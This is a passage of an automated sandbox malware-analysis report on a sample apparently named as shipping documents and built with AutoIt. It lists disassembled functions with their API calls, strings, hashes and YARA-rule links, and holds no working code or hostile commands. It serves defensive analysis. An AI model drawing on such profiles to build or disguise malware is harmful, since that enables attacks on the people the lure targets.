                                                • Opcode Fuzzy Hash: 1cd028f51df3a3a6803039a405f2f8f74a54366d3b5ec797420a07067e067d1c
                                                • Instruction Fuzzy Hash: 97A16271A40215BFEB14DB68DC4AFEE7BB9EB44711F008118FA15A71E0D7B8AD40CB68
                                                Function 006FAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FAF89
                                                • GetDriveTypeW.KERNEL32(?,0071FAC0,?,\\.\,0071F910), ref: 006FB066
                                                • SetErrorMode.KERNEL32(00000000,0071FAC0,?,\\.\,0071F910), ref: 006FB1C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 7b0f34ce0b20b27c74edfff13d4a9e8b1e7791a6704bc66791383da4f3c97a6c
                                                • Instruction ID: 9ad5df335fb600d6909f962f4d6a40786b626177b452169d6383b97d1b89d8ed
                                                • Opcode Fuzzy Hash: 7b0f34ce0b20b27c74edfff13d4a9e8b1e7791a6704bc66791383da4f3c97a6c
                                                • Instruction Fuzzy Hash: 6851B1706C430DFBCB10EB14C992DBD73B7AB147417209019E60AAB390CB799D42DB56
                                                Function 00696A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 5aff4ed33e123a1cd7f5a09e8e60abc07d51e9c4e6bd6da59c36939baad834ea
                                                • Instruction ID: 6ea282da8858b4fc851c5025c3640d86739d00d7f8abe3d7f71f942b7e564764
                                                • Opcode Fuzzy Hash: 5aff4ed33e123a1cd7f5a09e8e60abc07d51e9c4e6bd6da59c36939baad834ea
                                                • Instruction Fuzzy Hash: 418109F1600315BACF61AA64CC92FFE776FEF11300F144029F945AA6C6EB61DA91C3A5
                                                Function 00718C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00718D34
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718D45
                                                • CharNextW.USER32(0000014E), ref: 00718D74
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00718DB5
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00718DCB
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718DDC
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00718DF9
                                                • SetWindowTextW.USER32(?,0000014E), ref: 00718E45
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00718E5B
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00718E8C
                                                • _memset.LIBCMT ref: 00718EB1
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00718EFA
                                                • _memset.LIBCMT ref: 00718F59
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00718F83
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00718FDB
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00719088
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007190AA
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007190F4
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00719121
                                                • DrawMenuBar.USER32(?), ref: 00719130
                                                • SetWindowTextW.USER32(?,0000014E), ref: 00719158
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 6ea1afa11a5ec0ab88f2553cae1adbf8c9de7773e69c3c0b1a74f6012f31432f
                                                • Instruction ID: afaa40fdfd61f504eb24011725988af7a46595d024019542d77e1107b017132a
                                                • Opcode Fuzzy Hash: 6ea1afa11a5ec0ab88f2553cae1adbf8c9de7773e69c3c0b1a74f6012f31432f
                                                • Instruction Fuzzy Hash: BFE1A270900209ABDF60DF68DC84EEE7BB9EF09710F008159FA159A2D0DB788AC5DF65
                                                Function 00714B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00714C51
                                                • GetDesktopWindow.USER32 ref: 00714C66
                                                • GetWindowRect.USER32(00000000), ref: 00714C6D
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00714CCF
                                                • DestroyWindow.USER32(?), ref: 00714CFB
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00714D24
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00714D42
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00714D68
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00714D7D
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00714D90
                                                • IsWindowVisible.USER32(?), ref: 00714DB0
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00714DCB
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00714DDF
                                                • GetWindowRect.USER32(?,?), ref: 00714DF7
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00714E1D
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00714E37
                                                • CopyRect.USER32(?,?), ref: 00714E4E
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00714EB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: 3255e33ed484559a3f89dbdcaac323d099e2d945159ee8b07305f8b401e6626e
                                                • Instruction ID: 346fac13b1c166bd07900917a1310099658fedc4cb54c797146b71eff2e9a704
                                                • Opcode Fuzzy Hash: 3255e33ed484559a3f89dbdcaac323d099e2d945159ee8b07305f8b401e6626e
                                                • Instruction Fuzzy Hash: 25B1AC71608340AFDB44DF68C849BAABBE5FF88710F00891CF5899B2A1D775EC44CBA5
                                                Function 006F46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006F46E8
                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006F470E
                                                • _wcscpy.LIBCMT ref: 006F473C
                                                • _wcscmp.LIBCMT ref: 006F4747
                                                • _wcscat.LIBCMT ref: 006F475D
                                                • _wcsstr.LIBCMT ref: 006F4768
                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006F4784
                                                • _wcscat.LIBCMT ref: 006F47CD
                                                • _wcscat.LIBCMT ref: 006F47D4
                                                • _wcsncpy.LIBCMT ref: 006F47FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 699586101-1459072770
                                                • Opcode ID: 7c9755e09d5cc595400eaabc0da0ef2140b778955af4fd907a325cd9b133252c
                                                • Instruction ID: f9d8fc937fac71fa51d97a728af8301078870aade39a72ffca8cd2f5572fb5b3
                                                • Opcode Fuzzy Hash: 7c9755e09d5cc595400eaabc0da0ef2140b778955af4fd907a325cd9b133252c
                                                • Instruction Fuzzy Hash: 7F4117B16402057AE710BB648C46EFF77AEDF42710F00416DF904E62C2EF78DA8197A9
                                                Function 006927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928BC
                                                • GetSystemMetrics.USER32(00000007), ref: 006928C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928EF
                                                • GetSystemMetrics.USER32(00000008), ref: 006928F7
                                                • GetSystemMetrics.USER32(00000004), ref: 0069291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00692939
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00692949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069297C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00692990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 006929AE
                                                • GetStockObject.GDI32(00000011), ref: 006929CA
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 006929D5
                                                  • Part of subcall function 00692344: GetCursorPos.USER32(?), ref: 00692357
                                                  • Part of subcall function 00692344: ScreenToClient.USER32(007567B0,?), ref: 00692374
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                • SetTimer.USER32(00000000,00000000,00000028,00691256), ref: 006929FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: d4da7d4047f2cad16fcdf7026f1910a9b72fe07fbf455affe52ac81d6f47651b
                                                • Instruction ID: 9c8082148b6db8e299c0319db1f575c58368616e05849c4b59757091073a0c4d
                                                • Opcode Fuzzy Hash: d4da7d4047f2cad16fcdf7026f1910a9b72fe07fbf455affe52ac81d6f47651b
                                                • Instruction Fuzzy Hash: 86B15E7160020AAFDF14DFA8DC55BED7BBAFB08315F108129FA19A72E0DB74A851CB54
                                                Function 00714069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007140F6
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007141B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 3974292440-719923060
                                                • Opcode ID: ac818c4af1e50849401d9b95c193e6ecdb273095b3069d725a7a9a373f37245a
                                                • Instruction ID: 24879689870d17a439caa83e60032183f78b1215aecafa1b117e7af7487ec17b
                                                • Opcode Fuzzy Hash: ac818c4af1e50849401d9b95c193e6ecdb273095b3069d725a7a9a373f37245a
                                                • Instruction Fuzzy Hash: 95A194702143019FCB54EF28C851AAAB7A6BF44314F14896CF8A69B7D2DB34EC85CB55
                                                Function 007052F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00705309
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00705314
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0070531F
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 0070532A
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00705335
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00705340
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0070534B
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00705356
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00705361
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0070536C
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00705377
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00705382
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0070538D
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00705398
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007053A3
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007053AE
                                                • GetCursorInfo.USER32(?), ref: 007053BE
                                                • GetLastError.KERNEL32(00000001,00000000), ref: 007053E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$ErrorInfoLast
                                                • String ID:
                                                • API String ID: 3215588206-0
                                                • Opcode ID: a76bcffefebcfecd1697a5a907c29908e6378cd475d7c24a228f83ca65eb633a
                                                • Instruction ID: 45a49ae12b5482cf63d8e58d39386a29f915ea3fb6e915511a50a57d3ed5eacc
                                                • Opcode Fuzzy Hash: a76bcffefebcfecd1697a5a907c29908e6378cd475d7c24a228f83ca65eb633a
                                                • Instruction Fuzzy Hash: 1D415270E04319AADB109FBA8C499AFFEF8EF51B50B10452FF509E72D0DAB894018E65
                                                Function 006EAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 006EAAA5
                                                • __swprintf.LIBCMT ref: 006EAB46
                                                • _wcscmp.LIBCMT ref: 006EAB59
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006EABAE
                                                • _wcscmp.LIBCMT ref: 006EABEA
                                                • GetClassNameW.USER32(?,?,00000400), ref: 006EAC21
                                                • GetDlgCtrlID.USER32(?), ref: 006EAC73
                                                • GetWindowRect.USER32(?,?), ref: 006EACA9
                                                • GetParent.USER32(?), ref: 006EACC7
                                                • ScreenToClient.USER32(00000000), ref: 006EACCE
                                                • GetClassNameW.USER32(?,?,00000100), ref: 006EAD48
                                                • _wcscmp.LIBCMT ref: 006EAD5C
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006EAD82
                                                • _wcscmp.LIBCMT ref: 006EAD96
                                                  • Part of subcall function 006B386C: _iswctype.LIBCMT ref: 006B3874
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                • Opcode ID: d5932cca46065428f25e6589819a0f3f859a7e2459641939e95d02c188e88989
                                                • Instruction ID: c1f21cb962b910728fd75d5776ad60a63985f0bcec390429a01e95c09265a26a
                                                • Opcode Fuzzy Hash: d5932cca46065428f25e6589819a0f3f859a7e2459641939e95d02c188e88989
                                                • Instruction Fuzzy Hash: F0A1BF71205386AFD714DFA5C884BEAB7EAFF04355F10862DF99982290DB30F945CB92
                                                Function 006EB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 006EB3DB
                                                • _wcscmp.LIBCMT ref: 006EB3EC
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 006EB414
                                                • CharUpperBuffW.USER32(?,00000000), ref: 006EB431
                                                • _wcscmp.LIBCMT ref: 006EB44F
                                                • _wcsstr.LIBCMT ref: 006EB460
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006EB498
                                                • _wcscmp.LIBCMT ref: 006EB4A8
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 006EB4CF
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006EB518
                                                • _wcscmp.LIBCMT ref: 006EB528
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 006EB550
                                                • GetWindowRect.USER32(00000004,?), ref: 006EB5B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: 3b8b8897e9c42aa2fbf2d5e82abc2c67a1e5a9d02d7618a8959d00257f2850fd
                                                • Instruction ID: 93df8c1801e0b8c5cd826ca868d13635fef527eec6576ac13504b3830df50861
                                                • Opcode Fuzzy Hash: 3b8b8897e9c42aa2fbf2d5e82abc2c67a1e5a9d02d7618a8959d00257f2850fd
                                                • Instruction Fuzzy Hash: AE81DC710093859BDB00DF16C885FEB7BEAEF44314F049469FD898A2A6DB34DD49CBA1
                                                Function 0071C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DragQueryPoint.SHELL32(?,?), ref: 0071C917
                                                  • Part of subcall function 0071ADF1: ClientToScreen.USER32(?,?), ref: 0071AE1A
                                                  • Part of subcall function 0071ADF1: GetWindowRect.USER32(?,?), ref: 0071AE90
                                                  • Part of subcall function 0071ADF1: PtInRect.USER32(?,?,0071C304), ref: 0071AEA0
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0071C980
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0071C98B
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0071C9AE
                                                • _wcscat.LIBCMT ref: 0071C9DE
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0071C9F5
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0071CA0E
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0071CA25
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0071CA47
                                                • DragFinish.SHELL32(?), ref: 0071CA4E
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0071CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pru
                                                • API String ID: 169749273-4085695995
                                                • Opcode ID: 1c9c2f7c52becb39034883a5676ec7275fe8ae0a30ff0dbeb189ff90e977398d
                                                • Instruction ID: db47437a1c7ef583f35926b76516f961648f54fb8fc53a153f9de8817d420e23
                                                • Opcode Fuzzy Hash: 1c9c2f7c52becb39034883a5676ec7275fe8ae0a30ff0dbeb189ff90e977398d
                                                • Instruction Fuzzy Hash: 34616C71108301AFC701DF68DC89D9FBBE9EF89710F00492DF591971A1DB749A49CB5A
                                                Function 006EB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 59b41423b7e627414b98c8302ecfd0946ddbac1119fc056b65e95fe042998493
                                                • Instruction ID: 5646bb5f415eedd766fb8197096fd751369d8bcf389d3a3b328020140fe803d0
                                                • Opcode Fuzzy Hash: 59b41423b7e627414b98c8302ecfd0946ddbac1119fc056b65e95fe042998493
                                                • Instruction Fuzzy Hash: FB31ABB0A45345AADF51FA61CD43EFF77AA9F20750F600028B601725E2EF656F08C69A
                                                Function 006EC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 006EC4D4
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006EC4E6
